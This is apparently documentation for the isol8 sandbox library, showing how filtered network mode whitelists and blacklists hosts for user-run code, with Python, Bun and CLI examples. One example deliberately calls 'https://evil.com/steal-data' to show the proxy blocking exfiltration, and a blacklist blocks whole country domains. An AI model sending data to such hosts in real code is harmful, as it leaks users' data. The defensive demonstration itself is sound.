Skip to main content
When you need to run user-provided code that accesses the internet, isol8’s filtered network mode lets you control exactly which hosts are reachable. This is useful for platforms that allow users to fetch data from approved APIs without giving them unrestricted network access.

Filtered Network Mode

Allow access only to specific domains:
import { DockerIsol8 } from "isol8";

const isol8 = new DockerIsol8({
  mode: "ephemeral",
  network: "filtered",
  networkFilter: {
    whitelist: [
      "^api\\.github\\.com$",
      "^api\\.openai\\.com$",
      "^.*\\.wikipedia\\.org$",
    ],
  },
  memoryLimit: "512m",
  timeoutMs: 30000,
});

await isol8.start();

Fetching API Data

Let user code call approved APIs:
const result = await isol8.execute({
  code: `
import urllib.request, json

# This works — github.com is whitelisted
url = "https://api.github.com/repos/Illusion47586/isol8"
resp = urllib.request.urlopen(url)
data = json.loads(resp.read())
print(f"Stars: {data['stargazers_count']}")
print(f"Language: {data['language']}")
`,
  runtime: "python",
});

console.log(result.stdout);
// Stars: 42
// Language: TypeScript
Requests to non-whitelisted hosts are blocked by the proxy:
const result = await isol8.execute({
  code: `
import urllib.request
# This fails — evil.com is not whitelisted
try:
    urllib.request.urlopen("https://evil.com/steal-data")
except Exception as e:
    print(f"Blocked: {e}")
`,
  runtime: "python",
});
// Blocked: HTTP Error 403: Forbidden

Web Scraping with Packages

Install scraping libraries on the fly:
const result = await isol8.execute({
  code: `
import requests
from bs4 import BeautifulSoup

resp = requests.get("https://en.wikipedia.org/wiki/Docker_(software)")
soup = BeautifulSoup(resp.text, "html.parser")

# Extract the first paragraph
first_p = soup.select_one(".mw-parser-output > p:not(.mw-empty-elt)")
print(first_p.get_text()[:500])
`,
  runtime: "python",
  installPackages: ["requests", "beautifulsoup4"],
});

Node.js API Calls

const result = await isol8.execute({
  code: `
const resp = await fetch("https://api.github.com/repos/Illusion47586/isol8");
const data = await resp.json();
console.log(JSON.stringify({
  name: data.full_name,
  description: data.description,
  stars: data.stargazers_count,
}, null, 2));
`,
  runtime: "bun", // Bun has built-in fetch
});

Blacklist Mode

Instead of whitelisting specific hosts, block known-bad domains:
const isol8 = new DockerIsol8({
  mode: "ephemeral",
  network: "filtered",
  networkFilter: {
    blacklist: [
      ".*\\.ru$",            // Block all .ru domains
      ".*\\.cn$",            // Block all .cn domains
      "^malware\\..*",       // Block malware.* domains
      ".*crypto.*",          // Block anything with "crypto"
    ],
  },
});

Combining Secrets with Network Access

Safely call authenticated APIs without leaking credentials:
const isol8 = new DockerIsol8({
  mode: "ephemeral",
  network: "filtered",
  networkFilter: {
    whitelist: ["^api\\.openai\\.com$"],
  },
  secrets: {
    OPENAI_API_KEY: "sk-proj-abc123...",
  },
});

await isol8.start();

const result = await isol8.execute({
  code: `
import os, json, urllib.request

req = urllib.request.Request(
    "https://api.openai.com/v1/chat/completions",
    data=json.dumps({
        "model": "gpt-4o-mini",
        "messages": [{"role": "user", "content": "Say hello in 3 words"}],
    }).encode(),
    headers={
        "Authorization": f"Bearer {os.environ['OPENAI_API_KEY']}",
        "Content-Type": "application/json",
    },
)
resp = urllib.request.urlopen(req)
data = json.loads(resp.read())
print(data["choices"][0]["message"]["content"])
`,
  runtime: "python",
});

// The API key is masked if it accidentally appears in output
console.log(result.stdout);

Rate Limiting External Requests

Use isol8’s concurrency semaphore to limit how many requests go out simultaneously:
// isol8.config.json
// { "maxConcurrent": 3 }  // Only 3 containers can run at once

// Each container can make one request, so this limits concurrent external calls
const urls = [
  "https://api.github.com/repos/denoland/deno",
  "https://api.github.com/repos/oven-sh/bun",
  "https://api.github.com/repos/nodejs/node",
  "https://api.github.com/repos/python/cpython",
];

const results = await Promise.all(
  urls.map((url) =>
    isol8.execute({
      code: `
import urllib.request, json
data = json.loads(urllib.request.urlopen("${url}").read())
print(json.dumps({"name": data["full_name"], "stars": data["stargazers_count"]}))
`,
      runtime: "python",
    })
  )
);

// Only 3 run at a time due to maxConcurrent
const repos = results.map((r) => JSON.parse(r.stdout));
console.log(repos);

CLI Examples

# Fetch from an allowed API
isol8 run -e "
import urllib.request, json
data = json.loads(urllib.request.urlopen('https://api.github.com').read())
print(json.dumps(data, indent=2))
" --runtime python --net filtered --allow "^api\.github\.com$"

# Scrape a website
isol8 run scraper.py --net filtered \
  --allow "^en\.wikipedia\.org$" \
  --install requests --install beautifulsoup4

# Full network access (use with caution)
isol8 run script.py --net host